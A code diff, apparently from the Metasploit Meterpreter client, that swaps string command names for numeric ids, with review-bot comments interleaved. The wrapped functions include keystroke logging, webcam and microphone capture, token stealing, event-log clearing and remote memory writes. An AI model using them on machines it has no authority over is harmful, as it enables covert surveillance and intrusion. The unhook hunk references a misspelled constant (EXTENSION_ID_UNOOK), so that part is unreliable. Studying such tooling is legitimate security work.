@@ -100,7 +100,7 @@ def Registry.check_key_exists(root_key, base_key) # def Registry.open_remote_key(target_host, root_key) - request = Packet.create_request('stdapi_registry_open_remote_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY) request.add_tlv(TLV_TYPE_TARGET_HOST, target_host) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) @@ -115,7 +115,7 @@ def Registry.open_remote_key(target_host, root_key) # Creates the supplied registry key or opens it if it already exists. # def Registry.create_key(root_key, base_key, perm = KEY_READ) - request = Packet.create_request('stdapi_registry_create_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) @@ -131,7 +131,7 @@ def Registry.create_key(root_key, base_key, perm = KEY_READ) # Deletes the supplied registry key. # def Registry.delete_key(root_key, base_key, recursive = true) - request = Packet.create_request('stdapi_registry_delete_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY) flags = 0 if (recursive) @@ -153,7 +153,7 @@ def Registry.delete_key(root_key, base_key, recursive = true) # Closes the supplied registry key. # def Registry.close_key(hkey) - request = Packet.create_request('stdapi_registry_close_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY) request.add_tlv(TLV_TYPE_HKEY, hkey) @@ -167,7 +167,7 @@ def Registry.close_key(hkey) # def Registry.enum_key(hkey) keys = [] - request = Packet.create_request('stdapi_registry_enum_key') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY) request.add_tlv(TLV_TYPE_HKEY, hkey) 
@@ -182,7 +182,7 @@ def Registry.enum_key(hkey) end def Registry.enum_key_direct(root_key, base_key, perm = KEY_READ) - request = Packet.create_request('stdapi_registry_enum_key_direct') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT) keys = [] request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) @@ -209,7 +209,7 @@ def Registry.enum_key_direct(root_key, base_key, perm = KEY_READ) # Sets the registry value relative to the supplied hkey. # def Registry.set_value(hkey, name, type, data) - request = Packet.create_request('stdapi_registry_set_value') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE) request.add_tlv(TLV_TYPE_HKEY, hkey) request.add_tlv(TLV_TYPE_VALUE_NAME, name) @@ -223,13 +223,13 @@ def Registry.set_value(hkey, name, type, data) request.add_tlv(TLV_TYPE_VALUE_DATA, data) - response = client.send_request(request) + client.send_request(request) return true end def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_WRITE) - request = Packet.create_request('stdapi_registry_set_value_direct') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) @@ -245,7 +245,7 @@ def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_W request.add_tlv(TLV_TYPE_VALUE_DATA, data) - response = client.send_request(request) + client.send_request(request) true end @@ -255,7 +255,7 @@ def Registry.set_value_direct(root_key, base_key, name, type, data, perm = KEY_W # initialized RegistryValue instance if a match is found. # def Registry.query_value_direct(root_key, base_key, name, perm = KEY_READ) - request = Packet.create_request('stdapi_registry_query_value_direct') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT) request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) request.add_tlv(TLV_TYPE_BASE_KEY, base_key) 
@@ -278,7 +278,7 @@ def Registry.query_value_direct(root_key, base_key, name, perm = KEY_READ) end def Registry.query_value(hkey, name) - request = Packet.create_request('stdapi_registry_query_value') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE) request.add_tlv(TLV_TYPE_HKEY, hkey) request.add_tlv(TLV_TYPE_VALUE_NAME, name) @@ -303,7 +303,7 @@ def Registry.query_value(hkey, name) # registry key. # def Registry.delete_value(hkey, name) - request = Packet.create_request('stdapi_registry_delete_value') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE) request.add_tlv(TLV_TYPE_HKEY, hkey) request.add_tlv(TLV_TYPE_VALUE_NAME, name) @@ -319,7 +319,7 @@ def Registry.delete_value(hkey, name) # Queries the registry class name and returns a string # def Registry.query_class(hkey) - request = Packet.create_request('stdapi_registry_query_class') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS) request.add_tlv(TLV_TYPE_HKEY, hkey) @@ -335,7 +335,7 @@ def Registry.query_class(hkey) # names. An array of RegistryValue's is returned. # def Registry.enum_value(hkey) - request = Packet.create_request('stdapi_registry_enum_value') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE) values = [] request.add_tlv(TLV_TYPE_HKEY, hkey) @@ -351,7 +351,7 @@ def Registry.enum_value(hkey) end def Registry.enum_value_direct(root_key, base_key, perm = KEY_READ) - request = Packet.create_request('stdapi_registry_enum_value_direct') + request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT) values = [] request.add_tlv(TLV_TYPE_ROOT_KEY, root_key) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb index 4469a1e63328a..796cc04eb10eb 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb 
@@ -53,7 +53,7 @@ def self.finalize(client,handle) # Suspends the thread's execution. # def suspend - request = Packet.create_request('stdapi_sys_process_thread_suspend') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND) request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) @@ -66,7 +66,7 @@ def suspend # Resumes the thread's execution. # def resume - request = Packet.create_request('stdapi_sys_process_thread_resume') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME) request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) @@ -79,7 +79,7 @@ def resume # Terminates the thread's execution. # def terminate(code) - request = Packet.create_request('stdapi_sys_process_thread_terminate') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE) request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) request.add_tlv(TLV_TYPE_EXIT_CODE, code) @@ -99,7 +99,7 @@ def terminate(code) # Queries the register state of the thread. # def query_regs - request = Packet.create_request('stdapi_sys_process_thread_query_regs') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS) regs = {} request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) @@ -118,7 +118,7 @@ def query_regs # in the form of a hash. # def set_regs(regs_hash) - request = Packet.create_request('stdapi_sys_process_thread_set_regs') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS) request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) @@ -161,7 +161,7 @@ def pretty_regs # Closes the thread handle. # def self.close(client, handle) - request = Packet.create_request('stdapi_sys_process_thread_close') + request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE) request.add_tlv(TLV_TYPE_THREAD_HANDLE, handle) client.send_request(request, nil) handle = nil 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 14feacef4b0be..55c61b873beb8 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -6,6 +6,130 @@ module Meterpreter
 module Extensions
 module Stdapi
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_STDAPI = 1000
+
+# Associated command ids
+COMMAND_ID_STDAPI_FS_CHDIR = EXTENSION_ID_STDAPI + 1
+COMMAND_ID_STDAPI_FS_CHMOD = EXTENSION_ID_STDAPI + 2
+COMMAND_ID_STDAPI_FS_DELETE_DIR = EXTENSION_ID_STDAPI + 3
+COMMAND_ID_STDAPI_FS_DELETE_FILE = EXTENSION_ID_STDAPI + 4
+COMMAND_ID_STDAPI_FS_FILE_COPY = EXTENSION_ID_STDAPI + 5
+COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH = EXTENSION_ID_STDAPI + 6
+COMMAND_ID_STDAPI_FS_FILE_MOVE = EXTENSION_ID_STDAPI + 7
+COMMAND_ID_STDAPI_FS_GETWD = EXTENSION_ID_STDAPI + 8
+COMMAND_ID_STDAPI_FS_LS = EXTENSION_ID_STDAPI + 9
+COMMAND_ID_STDAPI_FS_MD5 = EXTENSION_ID_STDAPI + 10
+COMMAND_ID_STDAPI_FS_MKDIR = EXTENSION_ID_STDAPI + 11
+COMMAND_ID_STDAPI_FS_MOUNT_SHOW = EXTENSION_ID_STDAPI + 12
+COMMAND_ID_STDAPI_FS_SEARCH = EXTENSION_ID_STDAPI + 13
+COMMAND_ID_STDAPI_FS_SEPARATOR = EXTENSION_ID_STDAPI + 14
+COMMAND_ID_STDAPI_FS_SHA1 = EXTENSION_ID_STDAPI + 15
+COMMAND_ID_STDAPI_FS_STAT = EXTENSION_ID_STDAPI + 16
+COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE = EXTENSION_ID_STDAPI + 17
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE = EXTENSION_ID_STDAPI + 18
+COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES = EXTENSION_ID_STDAPI + 19
+COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT = EXTENSION_ID_STDAPI + 20
+COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY = EXTENSION_ID_STDAPI + 21
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES = EXTENSION_ID_STDAPI + 22
+COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE = EXTENSION_ID_STDAPI + 23
+COMMAND_ID_STDAPI_NET_RESOLVE_HOST = EXTENSION_ID_STDAPI + 24
+COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS = EXTENSION_ID_STDAPI + 25
+COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN = EXTENSION_ID_STDAPI + 26
+COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN = EXTENSION_ID_STDAPI + 27
+COMMAND_ID_STDAPI_RAILGUN_API = EXTENSION_ID_STDAPI + 28
+COMMAND_ID_STDAPI_RAILGUN_API_MULTI = EXTENSION_ID_STDAPI + 29
+COMMAND_ID_STDAPI_RAILGUN_MEMREAD = EXTENSION_ID_STDAPI + 30
+COMMAND_ID_STDAPI_RAILGUN_MEMWRITE = EXTENSION_ID_STDAPI + 31
+COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS = EXTENSION_ID_STDAPI + 32
+COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY = EXTENSION_ID_STDAPI + 33
+COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY = EXTENSION_ID_STDAPI + 34
+COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY = EXTENSION_ID_STDAPI + 35
+COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE = EXTENSION_ID_STDAPI + 36
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY = EXTENSION_ID_STDAPI + 37
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT = EXTENSION_ID_STDAPI + 38
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE = EXTENSION_ID_STDAPI + 39
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT = EXTENSION_ID_STDAPI + 40
+COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY = EXTENSION_ID_STDAPI + 41
+COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY = EXTENSION_ID_STDAPI + 42
+COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY = EXTENSION_ID_STDAPI + 43
+COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS = EXTENSION_ID_STDAPI + 44
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE = EXTENSION_ID_STDAPI + 45
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT = EXTENSION_ID_STDAPI + 46
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE = EXTENSION_ID_STDAPI + 47
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT = EXTENSION_ID_STDAPI + 48
+COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY = EXTENSION_ID_STDAPI + 49
+COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST = EXTENSION_ID_STDAPI + 50
+COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN = EXTENSION_ID_STDAPI + 51
+COMMAND_ID_STDAPI_SYS_CONFIG_GETENV = EXTENSION_ID_STDAPI + 52
+COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS = EXTENSION_ID_STDAPI + 53
+COMMAND_ID_STDAPI_SYS_CONFIG_GETSID = EXTENSION_ID_STDAPI + 54
+COMMAND_ID_STDAPI_SYS_CONFIG_GETUID = EXTENSION_ID_STDAPI + 55
+COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME = EXTENSION_ID_STDAPI + 56
+COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF = EXTENSION_ID_STDAPI + 57
+COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN = EXTENSION_ID_STDAPI + 58
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO = EXTENSION_ID_STDAPI + 59
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR = EXTENSION_ID_STDAPI + 60
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE = EXTENSION_ID_STDAPI + 61
+COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS = EXTENSION_ID_STDAPI + 62
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST = EXTENSION_ID_STDAPI + 63
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN = EXTENSION_ID_STDAPI + 64
+COMMAND_ID_STDAPI_SYS_EVENTLOG_READ = EXTENSION_ID_STDAPI + 65
+COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS = EXTENSION_ID_STDAPI + 66
+COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH = EXTENSION_ID_STDAPI + 67
+COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE = EXTENSION_ID_STDAPI + 68
+COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE = EXTENSION_ID_STDAPI + 69
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO = EXTENSION_ID_STDAPI + 70
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES = EXTENSION_ID_STDAPI + 71
+COMMAND_ID_STDAPI_SYS_PROCESS_GETPID = EXTENSION_ID_STDAPI + 72
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = EXTENSION_ID_STDAPI + 73
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = EXTENSION_ID_STDAPI + 74
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD = EXTENSION_ID_STDAPI + 75
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD = EXTENSION_ID_STDAPI + 76
+COMMAND_ID_STDAPI_SYS_PROCESS_KILL = EXTENSION_ID_STDAPI + 77
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = EXTENSION_ID_STDAPI + 78
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE = EXTENSION_ID_STDAPI + 79
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK = EXTENSION_ID_STDAPI + 80
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT = EXTENSION_ID_STDAPI + 81
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY = EXTENSION_ID_STDAPI + 82
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ = EXTENSION_ID_STDAPI + 83
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK = EXTENSION_ID_STDAPI + 84
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE = EXTENSION_ID_STDAPI + 85
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE = EXTENSION_ID_STDAPI + 86
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE = EXTENSION_ID_STDAPI + 87
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS = EXTENSION_ID_STDAPI + 88
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN = EXTENSION_ID_STDAPI + 89
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = EXTENSION_ID_STDAPI + 90
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME = EXTENSION_ID_STDAPI + 91
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS = EXTENSION_ID_STDAPI + 92
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND = EXTENSION_ID_STDAPI + 93
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE = EXTENSION_ID_STDAPI + 94
+COMMAND_ID_STDAPI_SYS_PROCESS_WAIT = EXTENSION_ID_STDAPI + 95
+COMMAND_ID_STDAPI_UI_DESKTOP_ENUM = EXTENSION_ID_STDAPI + 96
+COMMAND_ID_STDAPI_UI_DESKTOP_GET = EXTENSION_ID_STDAPI + 97
+COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT = EXTENSION_ID_STDAPI + 98
+COMMAND_ID_STDAPI_UI_DESKTOP_SET = EXTENSION_ID_STDAPI + 99
+COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD = EXTENSION_ID_STDAPI + 100
+COMMAND_ID_STDAPI_UI_ENABLE_MOUSE = EXTENSION_ID_STDAPI + 101
+COMMAND_ID_STDAPI_UI_GET_IDLE_TIME = EXTENSION_ID_STDAPI + 102
+COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 = EXTENSION_ID_STDAPI + 103
+COMMAND_ID_STDAPI_UI_SEND_KEYEVENT = EXTENSION_ID_STDAPI + 104
+COMMAND_ID_STDAPI_UI_SEND_KEYS = EXTENSION_ID_STDAPI + 105
+COMMAND_ID_STDAPI_UI_SEND_MOUSE = EXTENSION_ID_STDAPI + 106
+COMMAND_ID_STDAPI_UI_START_KEYSCAN = EXTENSION_ID_STDAPI + 107
+COMMAND_ID_STDAPI_UI_STOP_KEYSCAN = EXTENSION_ID_STDAPI + 108
+COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP = EXTENSION_ID_STDAPI + 109
+COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD = EXTENSION_ID_STDAPI + 110
+COMMAND_ID_STDAPI_WEBCAM_GET_FRAME = EXTENSION_ID_STDAPI + 111
+COMMAND_ID_STDAPI_WEBCAM_LIST = EXTENSION_ID_STDAPI + 112
+COMMAND_ID_STDAPI_WEBCAM_START = EXTENSION_ID_STDAPI + 113
+COMMAND_ID_STDAPI_WEBCAM_STOP = EXTENSION_ID_STDAPI + 114
+COMMAND_ID_STDAPI_AUDIO_MIC_START = EXTENSION_ID_STDAPI + 115
+COMMAND_ID_STDAPI_AUDIO_MIC_STOP = EXTENSION_ID_STDAPI + 116
+COMMAND_ID_STDAPI_AUDIO_MIC_LIST = EXTENSION_ID_STDAPI + 117
+
+
+
 ##
 #
 # General
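Review bot: The new `COMMAND_ID_STDAPI_*` table is now the wire contract that the commit message says the native, Python and C# tables are generated from, yet nothing in the hunk says the values are append-only; the three `AUDIO_MIC_*` entries at 115–117 already break the otherwise alphabetical order, which invites a later tidy-up that renumbers every id and silently desynchronises already-deployed payloads from this client. Add above the list: `# Wire-level ids shared with every Meterpreter implementation: never renumber or reuse a value, only append new ones at the end.` The `(needs to be a multiple of 1000)` requirement on `EXTENSION_ID_STDAPI` is likewise only a comment, and a cheap load-time assertion such as `raise 'EXTENSION_ID_STDAPI must be a multiple of 1000' unless (EXTENSION_ID_STDAPI % 1000).zero?` would catch a bad edit before it reaches the wire. That comment should also state that the 1000-wide block must be unique across extensions, since two extensions sharing a block would presumably have their commands misrouted at dispatch.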
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb index aa9a6ac4e2f51..18b355c0a345a 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb @@ -53,11 +53,11 @@ def disable_keyboard # Enable keyboard input on the remote machine. # def enable_keyboard(enable = true) - request = Packet.create_request('stdapi_ui_enable_keyboard') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD) request.add_tlv(TLV_TYPE_BOOL, enable) - response = client.send_request(request) + client.send_request(request) return true end @@ -73,11 +73,11 @@ def disable_mouse # Enable mouse input on the remote machine. # def enable_mouse(enable = true) - request = Packet.create_request('stdapi_ui_enable_mouse') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_ENABLE_MOUSE) request.add_tlv(TLV_TYPE_BOOL, enable) - response = client.send_request(request) + client.send_request(request) return true end @@ -87,7 +87,7 @@ def enable_mouse(enable = true) # from user input. # def idle_time - request = Packet.create_request('stdapi_ui_get_idle_time') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_GET_IDLE_TIME) response = client.send_request(request) @@ -98,7 +98,7 @@ def idle_time # Enumerate desktops. # def enum_desktops - request = Packet.create_request('stdapi_ui_desktop_enum') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_DESKTOP_ENUM) response = client.send_request(request) desktopz = [] if( response.result == 0 ) @@ -117,7 +117,7 @@ def enum_desktops # Get the current desktop meterpreter is using. # def get_desktop - request = Packet.create_request( 'stdapi_ui_desktop_get' ) + request = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_GET ) response = client.send_request( request ) desktop = {} if( response.result == 0 ) 
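Review bot: The `get_desktop` hunk keeps the padded form `Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_GET )` while every other rewritten call in this diff uses `Packet.create_request(COMMAND_ID_...)`; since the line is being rewritten anyway, normalise it to `request = Packet.create_request(COMMAND_ID_STDAPI_UI_DESKTOP_GET)`. The `set_desktop` and `screenshot` hunks on the next line carry the same padded spacing.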
@@ -136,7 +136,7 @@ def get_desktop # with screen/keyboard/mouse control). # def set_desktop( session=-1, station='WinSta0', name='Default', switch=false ) - request = Packet.create_request( 'stdapi_ui_desktop_set' ) + request = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_SET ) request.add_tlv( TLV_TYPE_DESKTOP_SESSION, session ) request.add_tlv( TLV_TYPE_DESKTOP_STATION, station ) request.add_tlv( TLV_TYPE_DESKTOP_NAME, name ) @@ -152,7 +152,7 @@ def set_desktop( session=-1, station='WinSta0', name='Default', switch=false ) # Grab a screenshot of the interactive desktop # def screenshot( quality=50 ) - request = Packet.create_request( 'stdapi_ui_desktop_screenshot' ) + request = Packet.create_request( COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT ) request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality ) if client.platform == 'windows' @@ -222,9 +222,9 @@ def screenshot( quality=50 ) # Unlock or lock the desktop # def unlock_desktop(unlock=true) - request = Packet.create_request('stdapi_ui_unlock_desktop') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP) request.add_tlv(TLV_TYPE_BOOL, unlock) - response = client.send_request(request) + client.send_request(request) return true end @@ -232,9 +232,9 @@ def unlock_desktop(unlock=true) # Start the keyboard sniffer # def keyscan_start(trackwindow=false) - request = Packet.create_request('stdapi_ui_start_keyscan') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_START_KEYSCAN) request.add_tlv( TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW, trackwindow ) - response = client.send_request(request) + client.send_request(request) return true end @@ -242,8 +242,8 @@ def keyscan_start(trackwindow=false) # Stop the keyboard sniffer # def keyscan_stop - request = Packet.create_request('stdapi_ui_stop_keyscan') - response = client.send_request(request) + request = Packet.create_request(COMMAND_ID_STDAPI_UI_STOP_KEYSCAN) + client.send_request(request) return true end 
@@ -251,7 +251,7 @@ def keyscan_stop # Dump the keystroke buffer # def keyscan_dump - request = Packet.create_request('stdapi_ui_get_keys_utf8') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8) response = client.send_request(request) return response.get_tlv_value(TLV_TYPE_KEYS_DUMP); end @@ -260,9 +260,9 @@ def keyscan_dump # Send keystrokes # def keyboard_send(keys) - request = Packet.create_request('stdapi_ui_send_keys') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_KEYS) request.add_tlv( TLV_TYPE_KEYS_SEND, keys ) - response = client.send_request(request) + client.send_request(request) return true end @@ -271,9 +271,9 @@ def keyboard_send(keys) # def keyevent_send(key_code, action = 0) key_data = [ action, key_code ].pack("VV") - request = Packet.create_request('stdapi_ui_send_keyevent') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_KEYEVENT) request.add_tlv( TLV_TYPE_KEYEVENT_SEND, key_data ) - response = client.send_request(request) + client.send_request(request) return true end @@ -281,7 +281,7 @@ def keyevent_send(key_code, action = 0) # Mouse input # def mouse(mouseaction, x=-1, y=-1) - request = Packet.create_request('stdapi_ui_send_mouse') + request = Packet.create_request(COMMAND_ID_STDAPI_UI_SEND_MOUSE) action = 0 case mouseaction when "move" @@ -306,7 +306,7 @@ def mouse(mouseaction, x=-1, y=-1) request.add_tlv( TLV_TYPE_MOUSE_ACTION, action ) request.add_tlv( TLV_TYPE_MOUSE_X, x.to_i ) request.add_tlv( TLV_TYPE_MOUSE_Y, y.to_i ) - response = client.send_request(request) + client.send_request(request) return true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 2797efba518fc..601c2f11dad86 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb 
@@ -26,7 +26,7 @@ def session
   end
 
   def webcam_list
-    response = client.send_request(Packet.create_request('stdapi_webcam_list'))
+    response = client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_LIST))
     names = []
     response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
       names << tlv.value
@@ -36,21 +36,21 @@ def webcam_list
 
   # Starts recording video from video source of index +cam+
   def webcam_start(cam)
-    request = Packet.create_request('stdapi_webcam_start')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_START)
     request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam)
     client.send_request(request)
     true
   end
 
   def webcam_get_frame(quality)
-    request = Packet.create_request('stdapi_webcam_get_frame')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_GET_FRAME)
     request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
   end
 
   def webcam_stop
-    client.send_request(Packet.create_request('stdapi_webcam_stop'))
+    client.send_request(Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_STOP))
     true
   end
 
@@ -77,7 +77,7 @@ def webcam_chat(server)
   # Record from default audio source for +duration+ seconds;
   # returns a low-quality wav file
   def record_mic(duration)
-    request = Packet.create_request('stdapi_webcam_audio_record')
+    request = Packet.create_request(COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD)
     request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_AUDIO_DATA).value
diff --git a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
index 88eee2c18aca5..13fb1ddf0c17c 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/tlv.rb
@@ -4,7 +4,15 @@ module Post
 module Meterpreter
 module Extensions
 module Unhook
-  TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_UNHOOK = 10000
+
+# Associated command ids
+COMMAND_ID_UNHOOK_PE = EXTENSION_ID_UNHOOK + 1
+
+TLV_TYPE_UNHOOK_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
index e42104e6c6518..7426a1a93cf8d 100644
--- a/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
+++ b/lib/rex/post/meterpreter/extensions/unhook/unhook.rb
@@ -17,6 +17,10 @@ module Unhook
 class Unhook < Extension
   UNHOOK_ERROR_SUCCESS = 0
 
+  def self.extension_id
+    EXTENSION_ID_UNOOK
+  end
+
